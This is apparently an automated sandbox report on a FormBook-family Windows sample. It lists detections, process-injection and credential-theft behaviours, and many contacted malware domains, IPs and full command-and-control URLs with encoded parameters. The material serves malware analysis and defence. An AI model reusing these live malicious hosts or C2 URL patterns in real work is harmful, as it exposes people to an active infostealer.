          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 794399 Sample: file.exe Startdate: 30/01/2023 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 5 other signatures 2->38 8 file.exe 1 2->8         started        process3 file4 24 C:\Users\user\AppData\Local\...\file.exe.log, CSV 8->24 dropped 50 Writes to foreign memory regions 8->50 52 Allocates memory in foreign processes 8->52 54 Injects a PE file into a foreign processes 8->54 12 CasPol.exe 8->12         started        15 CasPol.exe 8->15         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Sample uses process hollowing technique 12->60 62 Queues an APC in another process (thread injection) 12->62 17 explorer.exe 6 6 12->17 injected process8 dnsIp9 26 www.teammart.online 184.94.215.91, 49727, 49728, 49729 VXCHNGE-NC01US United States 17->26 28 frogair.online 81.169.145.72, 49737, 49738, 49739 STRATOSTRATOAGDE Germany 17->28 30 13 other IPs or domains 17->30 40 System process connects to network (likely due to code injection or exploit) 17->40 21 msiexec.exe 13 17->21         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 21->42 44 Tries to harvest and steal browser information (history, passwords, etc) 21->44 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe62%ReversingLabsByteCode-MSIL.Trojan.FormBook
          file.exe51%VirustotalBrowse
          file.exe100%AviraHEUR/AGEN.1203876
          file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.file.exe.f20000.0.unpack100%AviraHEUR/AGEN.1203876Download File
          2.2.CasPol.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          hvlandscapes.biz1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5100%Avira URL Cloudmalware
          http://www.frogair.online2%VirustotalBrowse
          http://www.hvlandscapes.biz/crhz/2%VirustotalBrowse
          http://www.popcors.com/crhz/0%VirustotalBrowse
          http://www.nftspaceview.com0%Avira URL Cloudsafe
          http://www.hvlandscapes.biz/crhz/100%Avira URL Cloudmalware
          http://www.popcors.com/crhz/0%Avira URL Cloudsafe
          http://www.frogair.online100%Avira URL Cloudmalware
          http://www.laylaroseuk.com100%Avira URL Cloudmalware
          http://www.mitsubangsaen.online100%Avira URL Cloudmalware
          http://www.mitsubangsaen.online/crhz/100%Avira URL Cloudmalware
          http://www.teammart.online100%Avira URL Cloudmalware
          http://www.popcors.comCR0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.n-r-eng.com/crhz/100%Avira URL Cloudmalware
          http://www.hayuterce.com100%Avira URL Cloudmalware
          http://www.n-r-eng.com100%Avira URL Cloudmalware
          http://www.suachuadienlanh247.com0%Avira URL Cloudsafe
          http://www.wenzid4.topd0%Avira URL Cloudsafe
          http://www.wylvxing.com/crhz/0%Avira URL Cloudsafe
          http://www.thepromotionhunter.com0%Avira URL Cloudsafe
          https://www.tf8dangky.online/crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T0%Avira URL Cloudsafe
          http://www.tf8dangky.online/crhz/0%Avira URL Cloudsafe
          http://www.popcors.com0%Avira URL Cloudsafe
          http://www.hayuterce.com/crhz/100%Avira URL Cloudmalware
          http://www.wenzid4.top/crhz/0%Avira URL Cloudsafe
          http://www.sandpiper-apts.com0%Avira URL Cloudsafe
          http://www.teammart.online/crhz/100%Avira URL Cloudmalware
          http://www.tf8dangky.online0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/crhz/0%Avira URL Cloudsafe
          http://www.teammart.onlineq0%Avira URL Cloudsafe
          http://www.nftspaceview.com~bm10%Avira URL Cloudsafe
          http://www.wylvxing.com0%Avira URL Cloudsafe
          http://www.thepromotionhunter.com/crhz/0%Avira URL Cloudsafe
          http://www.sandpiper-apts.com/crhz/100%Avira URL Cloudmalware
          http://www.nftspaceview.com/crhz/0%Avira URL Cloudsafe
          http://www.hvlandscapes.biz0%Avira URL Cloudsafe
          http://www.frogair.online/crhz/100%Avira URL Cloudmalware
          http://www.suachuadienlanh247.com/crhz/100%Avira URL Cloudmalware
          http://www.laylaroseuk.com/crhz/100%Avira URL Cloudmalware
          http://www.nortonseecurity.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          hvlandscapes.biz
          		76.223.105.230
          		truetrueunknown
          laylaroseuk.com
          		2.57.90.16
          		truetrue
            		unknown
            www.n-r-eng.com
            		185.151.199.52
            		truetrue
              		unknown
              www.teammart.online
              		184.94.215.91
              		truetrue
                		unknown
                www.sandpiper-apts.com
                		164.88.201.214
                		truetrue
                  		unknown
                  www.suachuadienlanh247.com
                  		103.221.223.104
                  		truetrue
                    		unknown
                    ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com
                    		18.138.206.213
                    		truefalse
                      		high
                      frogair.online
                      		81.169.145.72
                      		truetrue
                        		unknown
                        cname.u01.df.bkk1.cloud.z.com
                        		163.44.198.50
                        		truefalse
                          		high
                          www.tf8dangky.online
                          		unknown
                          		unknowntrue
                            		unknown
                            www.laylaroseuk.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.frogair.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.mitsubangsaen.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.hvlandscapes.biz
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.hvlandscapes.biz/crhz/true
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.mitsubangsaen.online/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.n-r-eng.com/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.tf8dangky.online/crhz/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.teammart.online/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.sandpiper-apts.com/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.frogair.online/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.suachuadienlanh247.com/crhz/true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtab30q5648k6.4.drfalse
                                      		high
                                      https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5explorer.exe, 00000003.00000002.529615477.0000000014588000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004D88000.00000004.10000000.00040000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/ac/?q=30q5648k6.4.drfalse
                                        		high
                                        http://www.nftspaceview.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.frogair.onlineexplorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.popcors.com/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mitsubangsaen.onlineexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.522017147.0000000005ABA000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://search.yahoo.com?fr=crmas_sfpf30q5648k6.4.drfalse
                                          		high
                                          http://www.laylaroseuk.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.teammart.onlineexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.popcors.comCRexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.wenzid4.topexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hayuterce.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.n-r-eng.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.suachuadienlanh247.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.wenzid4.topdexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.wylvxing.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.259739427.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.252270901.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.525383078.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.511672608.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.thepromotionhunter.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://search.yahoo.com?fr=mainmsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.4.drfalse
                                                		high
                                                https://www.tf8dangky.online/crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64Texplorer.exe, 00000003.00000002.529615477.00000000148AC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.00000000050AC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.popcors.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hayuterce.com/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=30q5648k6.4.drfalse
                                                  		high
                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search30q5648k6.4.drfalse
                                                    		high
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=msiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.4.drfalse
                                                      		high
                                                      http://www.wenzid4.top/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://search.yahoo.com?fr=main_sfpfmsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=30q5648k6.4.drfalse
                                                          		high
                                                          https://search.yahoo.com?fr=crmas_sfp30q5648k6.4.drfalse
                                                            		high
                                                            http://www.sandpiper-apts.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tf8dangky.onlineexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://search.yahoo.com/searchmsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.nortonseecurity.com/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.nftspaceview.com~bm1explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.teammart.onlineqexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.thepromotionhunter.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.wylvxing.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.nftspaceview.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=30q5648k6.4.drfalse
                                                                		high
                                                                http://www.hvlandscapes.bizexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.laylaroseuk.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.nortonseecurity.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                185.151.199.52
                                                                		www.n-r-eng.comIsrael
                                                                		12400PARTNER-ASILtrue
                                                                18.138.206.213
                                                                		ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.comUnited States
                                                                		16509AMAZON-02USfalse
                                                                81.169.145.72
                                                                		frogair.onlineGermany
                                                                		6724STRATOSTRATOAGDEtrue
                                                                76.223.105.230
                                                                		hvlandscapes.bizUnited States
                                                                		16509AMAZON-02UStrue
                                                                164.88.201.214
                                                                		www.sandpiper-apts.comSouth Africa
                                                                		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                                103.221.223.104
                                                                		www.suachuadienlanh247.comViet Nam
                                                                		18403FPT-AS-APTheCorporationforFinancingPromotingTechnolotrue
                                                                163.44.198.50
                                                                		cname.u01.df.bkk1.cloud.z.comSingapore
                                                                		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGfalse
                                                                2.57.90.16
                                                                		laylaroseuk.comLithuania
                                                                		47583AS-HOSTINGERLTtrue
                                                                184.94.215.91
                                                                		www.teammart.onlineUnited States
                                                                		394896VXCHNGE-NC01UStrue

                                                                General Information

                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                Analysis ID:794399
                                                                Start date and time:2023-01-30 14:50:38 +01:00
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 13m 2s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:13
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample file name:file.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@9/9
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HDC Information:
                                                                • Successful, ratio: 54.5% (good quality ratio 47.8%)
                                                                • Quality average: 69.9%
                                                                • Quality standard deviation: 33.6%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 105
                                                                • Number of non-executed functions: 92
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                14:51:33API Interceptor1x Sleep call for process: file.exe modified
                                                                14:51:54API Interceptor799x Sleep call for process: explorer.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                185.151.199.52file.exeGet hashmaliciousBrowse
                                                                • www.n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD
                                                                18.138.206.213mt103.jsGet hashmaliciousBrowse
                                                                • www.tf8dangky.online/crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_
                                                                file.exeGet hashmaliciousBrowse
                                                                • www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD
                                                                0ekqA0CV4E.exeGet hashmaliciousBrowse
                                                                • www.cuahangdientuminhlong.net/r5dd/?b0=P99om3J/T/FRLJAwtrj40ngyT3b2utMucK82nkVWx+xFT/xaBYKtVk24JKdFxF3O+V30lC7dEVmSOjMip0UBKYMUGzj8t/IdkEE+LiU5QoNT&TdTp-=4hcx
                                                                Urgent Request For Quotation.exeGet hashmaliciousBrowse
                                                                • www.vienuongdamos1.click/snky/?OXFT7P=CrZdQH0pdxsX&DR-TO=SK+9X5h637+zVRkqNV0F/SPX3aow/LEUgHsJx0ifp4IsOmNALs/k8zD241IUoMJHkFP/+TgfiKCboFK3fJBLJF+yW5D4O6X3LA==
                                                                Group_IV.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/hzb3/?YTbT=4hfLs&jZ_l=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
                                                                Group_Invitation.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/hzb3/?n2Ml2P=nXrPh&k4=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
                                                                HCM152611.exeGet hashmaliciousBrowse
                                                                • www.suckhoecuocsong.tech/q0io/?4hWxO=Y6ADp&9rkH3ZO8=5tRFI8M3/JSTUeni4WA8h/PTXvbE7kX2e+pOlXs8QEjEIZVFWUWJBSt7+aUZquS+iVS4LoiZrxm72UeSXqDEge02GZQoUoy/+g==
                                                                DHL Notification_pdf.exeGet hashmaliciousBrowse
                                                                • www.hi88pro.online/g2e8/?c8wPTfYh=hHC0fVZJkTupkVGAJP54fDRir+upx/Q+y/tNblWMINid9FABSMS6rT2WgmrCh52ZNxTb&6lux=VZSXpzy0D
                                                                GROUP INVITATION.exeGet hashmaliciousBrowse
                                                                • www.granolanuts.online/hzb3/?6liTCD=PPsT&eV2=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
                                                                DHL SHIPMENT NOTIFICATION_PDF.exeGet hashmaliciousBrowse
                                                                • www.suckhoe4phuong-555.click/6cs0/?oX8=cPf0KzEX&6lp4qX=qrfk11bjIYCaXHFMLv2pBMgG1JQ0d71Y+uc3EWldY+sc3kzgf5kC/g1Py5b/6PRzF0QzmQMSSy6sSqMMKjtvFP/Jg7irNxVJJA==
                                                                ORDER NO VOL- 6542 335 22.exeGet hashmaliciousBrowse
